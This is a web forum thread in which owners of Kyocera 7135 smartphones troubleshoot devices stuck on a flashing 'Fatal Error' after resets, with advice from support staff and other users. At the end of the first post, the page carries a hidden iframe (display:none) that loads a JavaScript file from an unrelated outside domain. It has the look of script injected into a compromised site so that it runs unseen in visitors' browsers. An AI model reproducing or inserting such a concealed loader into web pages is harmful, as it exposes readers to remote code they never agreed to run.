+ Reply to Thread

Hard reset failed !!!??? Help

I just got my Kyocera 7135 yesterday, with service from Verizon.
    I got it through getconnected.
    Phone was activated and worked fine.
    I did initial sync as instructed (remove Saved_preferences.prc from PC). Everything seemed fine.
    I was surfing via Openwave (I think - it is Palm icon that says "Browser"). This is software that came bundled with the phone. That software complained that I did not have a key (encryption key I assume). So I tried to create one; that failed.
    Giving up I tried to "exit browser". The software said "Exiting browser..." The dial-up connection dropped (as expected) but the screen never changed (i.e. locked up).
    So I tried a soft reset. That resulted in a rapidly flashing / flickering "Fatal Error" screen (with a reset button that you cannot press with stylus nor OK hardware button).
    OK, so I tried a hard reset...I got the same flashing Fatal Error!
    I tried various other hard reset techniques mentioned in this forum (like putting it in cradle without a battery). They all result in the same flashing fatal error.
    I have the battery in the cradle and I am waiting for Kyocera tech support to open. After an hour or no battery I will try again and post results.
    In the meanwhile, does anyone know how I can fix this?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator
    if yu did a cold boot properly, it should have restored the phone to factory, so just make sure you follow the firections carefully for a cold boot...

the key is gathered from verizon. just call them up and they will authenticate you in the system...

Re: Hard reset failed !!!??? Help

Originally posted by maven
    I just got my Kyocera 7135 yesterday, with service from Verizon.
    I got it through getconnected.
    Phone was activated and worked fine.
    I did initial sync as instructed (remove Saved_preferences.prc from PC). Everything seemed fine.
    I was surfing via Openwave (I think - it is Palm icon that says "Browser"). This is software that came bundled with the phone. That software complained that I did not have a key (encryption key I assume). So I tried to create one; that failed.
    Giving up I tried to "exit browser". The software said "Exiting browser..." The dial-up connection dropped (as expected) but the screen never changed (i.e. locked up).
    So I tried a soft reset. That resulted in a rapidly flashing / flickering "Fatal Error" screen (with a reset button that you cannot press with stylus nor OK hardware button).
    OK, so I tried a hard reset...I got the same flashing Fatal Error!
    I tried various other hard reset techniques mentioned in this forum (like putting it in cradle without a battery). They all result in the same flashing fatal error.
    I have the battery in the cradle and I am waiting for Kyocera tech support to open. After an hour or no battery I will try again and post results.
    In the meanwhile, does anyone know how I can fix this?
    Regarding your initial issue, to use the OpenWave browser, you need Verizon's Mobile Web service. Since you can use the EIS Eudora Web, or any number of good third party browsers to browse the web with a QNC connection, it is probably not worth the $10/month they charge for Mobile Web (The Blazer browser can view WAP sites).

See http://www.smartphonesource.com/vbul...&threadid=6431 for descriptions of the various data services available from Verizon.

Alan

It's dead Jim.
    I am doing the hard reset correctly.
    After several hours without a battery it still gives flashing fatal error.
    When the hard reset doesn't work you know you're FUBAR.
    I will post the conclusion to this sad saga after I talk to Kyocera support.

It is OFFICIALLY DEAD according to Kyocera tech support.

BTW - The tech had me try something interesting.
    He had me remove the battery then press AND HOLD the reset button for about 20 secs. He claimed this should drain some internal capacitors. Of course, this did not fix my phone.
    Therefore, it is getting shipped back to getconnected.com for replacement.

One last note: the tech said they only encountered this problem once before with an internal Kyocera employee who was loading "tons of 3rd party software". He advised me to not load all my 3rd party apps at once next time. I think this is nonsense - a 3rd party app can destroy the unit?!? I hope not. It sounds more like a bad unit.

Administrator
    the right combo of hacks could bring a hybrid smartphone to its knees.. sure the phone could have been a bad unit, but hacks can screw this phone up...

Maven - I guess I'm number 2! Mine died on the plane yesterday, while trying to Hot Sync. After the sync, the phone got stuck in "Cleaning Up, please wait" mode. After an hour, I tried the hard reset, and now the only activity I can get from the phone is the initial Palm Powered screen, baclit, and blinking on and off. I tried the capacitor drain trick to no avail. I'll contact Get Connected tomorrow (today is Sunday). I'm very depressed that i will have to go a few days w/out the phone. How fast did Get Connected replace you phone?

GetConnected was great. Email returns@getconnected.com, include your order number and description of problem. They told me to ship the phone back and send them the tracking number.
    They promised to reimburse me $10 for shipping. TBD

As soon as they saw the tracking number they sent the replacement phone FedEx priority overnight (but they sent it on Friday so I didn't get it until Monday morning ).
    So now I'm back online.

I THINK I know what happened:
    The instructions in the box say "Existing Palm users should erase Saved_Preferences.prc from PC before the first sync."

I did that, BUT the Kyocera support web site says to remove BOTH Saved_Preferences.prc and the NetworkDB.prc files!!!
    (read it here http://support.kyocera-wireless.com/...ic/kyo1055.htm)

What? Now they tell me. I didn't remove NetworkDB.prc, and mine died JUST AFTER using the networking. HMMMMMMMM

I think this deserves a separate post. "Remove NetworkDB.prc before first sync".

"Remove NetworkDB.prc before first sync". My file says PDB, there is not .PRC... was that true in your case?

Originally posted by liltiki
    "Remove NetworkDB.prc before first sync". My file says PDB, there is not .PRC... was that true in your case?
    Yeah, it is actually a .pdb not a .prc

Alan

I agree w/that advice. My problems were not as severe as yours but my network set up would have been faster if I had not retain that file.

Mine died too. 1 day old and crashed while syncing. Hard reset won't work. Hope they can replace it tomorrow...
    Linda

17" powerbook OSX

Never involved in a flame war! sputnik's Avatar
    so this issue so far is limited to those upgrading from a previous palm device, correct?
    _______
    Spu|nik VZW Kyo 7135 / VZW XV6600 / Sprint Mogul / Sprint Touch Pro / Sprint Touch Pro 2 / Apple iPhone 4 / ???

My crashing wasn't syncing old stuff. I deleted all my old palm files before the first time sync. I had added files and had done several more syncs before it crashed.
    I had what I now think are some signs that the phone might be defective. The first time I put the battery in the phone just booted up. I can't power down the phone. Even after a hard reset. I will bring it into the store this morning the "help desk" wasn't any. They had never seen the phone before.
    Linda

17" powerbook OSX